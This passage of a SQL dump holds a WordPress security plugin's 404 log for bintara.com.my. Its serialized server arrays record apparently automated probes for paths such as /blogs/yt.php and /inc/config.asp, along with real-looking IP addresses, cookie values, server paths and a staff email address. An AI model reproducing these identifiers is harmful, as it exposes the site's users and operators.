6.1)\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:30:\"http://bintara.com.my/cert.cer\";s:19:\"REDIRECT_SCRIPT_URL\";s:9:\"/cert.cer\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaAF3yuNlhOpg688@F7kxQAAAYk\";s:12:\"REDIRECT_URL\";s:9:\"/cert.cer\";s:11:\"REMOTE_ADDR\";s:12:\"182.99.41.32\";s:11:\"REMOTE_PORT\";s:5:\"64128\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:30:\"http://bintara.com.my/cert.cer\";s:10:\"SCRIPT_URL\";s:9:\"/cert.cer\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XaAF3yuNlhOpg688@F7kxQAAAYk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570768351.2415\";s:12:\"REQUEST_TIME\";s:10:\"1570768351\";}}','notice','2019-10-11 04:32:34','2019-10-11 04:32:31',35407360,37208936,'http://bintara.com.my//cert.cer',1,0,'182.99.41.32'),(27896,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/strs/md5.asp\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=08a7dfa64f4c2ba87d4dab576672c47f\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:35:\"http://bintara.com.my//strs/md5.asp\";s:15:\"HTTP_USER_AGENT\";s:50:\"Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/strs/md5.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/strs/md5.asp\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaAGW0dNB4K79x2TJltgJwAAAIc\";s:12:\"REDIRECT_URL\";s:13:\"/strs/md5.asp\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:15:\"114.234.204.238\";s:11:\"REMOTE_PORT\";s:5:\"51176\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/strs/md5.asp\";s:10:\"SCRIPT_URL\";s:13:\"/strs/md5.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XaAGW0dNB4K79x2TJltgJwAAAIc\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570768475.3925\";s:12:\"REQUEST_TIME\";s:10:\"1570768475\";}}','notice','2019-10-11 04:34:37','2019-10-11 04:34:35',35024800,36829296,'https://bintara.com.my/strs/md5.asp',1,0,'114.234.204.238'),(27897,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:65:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/blogs/yt.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=8597797a4c38cb47bcc480a2102ccf9f\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:35:\"http://bintara.com.my//blogs/yt.php\";s:15:\"HTTP_USER_AGENT\";s:50:\"Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/blogs/yt.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:13:\"/blogs/yt.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaAGnEdNB4K79x2TJltgbgAAAJM\";s:38:\"REDIRECT_REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:47:\"REDIRECT_REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/blogs/yt.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:13:\"/blogs/yt.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaAGnEdNB4K79x2TJltgbgAAAJM\";s:29:\"REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:38:\"REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/blogs/yt.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/blogs/yt.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaAGnEdNB4K79x2TJltgbgAAAJM\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:15:\"114.234.204.238\";s:11:\"REMOTE_PORT\";s:5:\"53031\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/blogs/yt.php\";s:10:\"SCRIPT_URL\";s:13:\"/blogs/yt.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XaAGnEdNB4K79x2TJltgbgAAAJM\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1570768541.053\";s:12:\"REQUEST_TIME\";s:10:\"1570768541\";}}','notice','2019-10-11 04:35:43','2019-10-11 04:35:41',35045088,36851248,'https://bintara.com.my/blogs/yt.php',1,0,'114.234.204.238'),(27898,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/inc/config.asp\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=b3ec361235898ea3b5a0ec02101e69d1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:37:\"http://bintara.com.my//inc/config.asp\";s:15:\"HTTP_USER_AGENT\";s:50:\"Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/inc/config.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/inc/config.asp\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaAGtkdNB4K79x2TJltgowAAAJI\";s:12:\"REDIRECT_URL\";s:15:\"/inc/config.asp\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:15:\"114.234.204.238\";s:11:\"REMOTE_PORT\";s:5:\"53637\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"https://bintara.com.my/inc/config.asp\";s:10:\"SCRIPT_URL\";s:15:\"/inc/config.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XaAGtkdNB4K79x2TJltgowAAAJI\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570768566.3449\";s:12:\"REQUEST_TIME\";s:10:\"1570768566\";}}','notice','2019-10-11 04:36:08','2019-10-11 04:36:06',35030480,36847168,'https://bintara.com.my/inc/config.asp',1,0,'114.234.204.238'),(27899,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/autodiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"353\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:2:\"en\";s:22:\"HTTP_CLIENT_REQUEST_ID\";s:38:\"{D24660F7-C75D-41E4-B798-F1EAE7985862}\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=ec912d500414cd5d8fd42a64f4fb80e3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"MacOutlook/16.29.0.190908 (Intelx64 Mac OS X Version 10.14.6 (Build 18G103))\";s:32:\"HTTP_X_AUTODISCOVERARCHIVEASSMTP\";s:4:\"true\";s:23:\"HTTP_X_CLIENTSTATISTICS\";s:93:\"DeviceID=F0686271-88A1-564F-9A8A-8219BFC1DA2C; SessionID=860B8C25-1C0F-4BE4-9ED3-FC0A5B28C542\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:20:\"HTTP_X_USER_IDENTITY\";s:20:\"fatin@bintara.com.my\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaALF6@b3MSbXPcLggr@PQAAAFM\";s:12:\"REDIRECT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:11:\"1.32.27.119\";s:11:\"REMOTE_PORT\";s:5:\"51220\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XaALF6@b3MSbXPcLggr@PQAAAFM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570769687.5685\";s:12:\"REQUEST_TIME\";s:10:\"1570769687\";}}','notice','2019-10-11 04:54:51','2019-10-11 04:54:48',35734072,37528464,'https://bintara.com.my/autodiscover/autodiscover.xml',1,0,'1.32.27.119'),(27900,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:24:\"/?page_id=18/contact.php\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_KEEP_ALIVE\";s:2:\"15\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:22:\"page_id=18/contact.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"136.243.199.108\";s:11:\"REMOTE_PORT\";s:5:\"53108\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XaARZW0pAioKYUFEOtCFhgAAAcE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570771301.1689\";s:12:\"REQUEST_TIME\";s:10:\"1570771301\";}}','notice','2019-10-11 05:21:44','2019-10-11 05:21:41',35420088,37229408,'https://bintara.com.my/?page_id=18/contact.php',1,0,'136.243.199.108'),(27901,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:24:\"/?page_id=18/contact.php\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_KEEP_ALIVE\";s:2:\"15\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:22:\"page_id=18/contact.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"136.243.199.108\";s:11:\"REMOTE_PORT\";s:5:\"54216\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XaAReSuNlhOpg688@F7mvwAAAZc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1570771321.792\";s:12:\"REQUEST_TIME\";s:10:\"1570771321\";}}','notice','2019-10-11 05:22:04','2019-10-11 05:22:02',35027368,36837840,'https://bintara.com.my/?page_id=18/contact.php',1,0,'136.243.199.108'),(27902,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:24:\"/?page_id=18/contact.php\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_KEEP_ALIVE\";s:2:\"15\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:22:\"page_id=18/contact.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"136.243.199.108\";s:11:\"REMOTE_PORT\";s:5:\"55504\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XaARjAKNH2yIeM@cFqwqSwAAAA0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570771341.1167\";s:12:\"REQUEST_TIME\";s:10:\"1570771341\";}}','notice','2019-10-11 05:22:22','2019-10-11 05:22:21',35027368,36837840,'https://bintara.com.my/?page_id=18/contact.php',1,0,'136.243.199.108'),(27903,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36,gzip(gfe)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"204.152.200.243\";s:11:\"REMOTE_PORT\";s:5:\"57011\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XaAUd6@b3MSbXPcLggr-IgAAAEw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570772087.6396\";s:12:\"REQUEST_TIME\";s:10:\"1570772087\";}}','notice','2019-10-11 05:34:50','2019-10-11 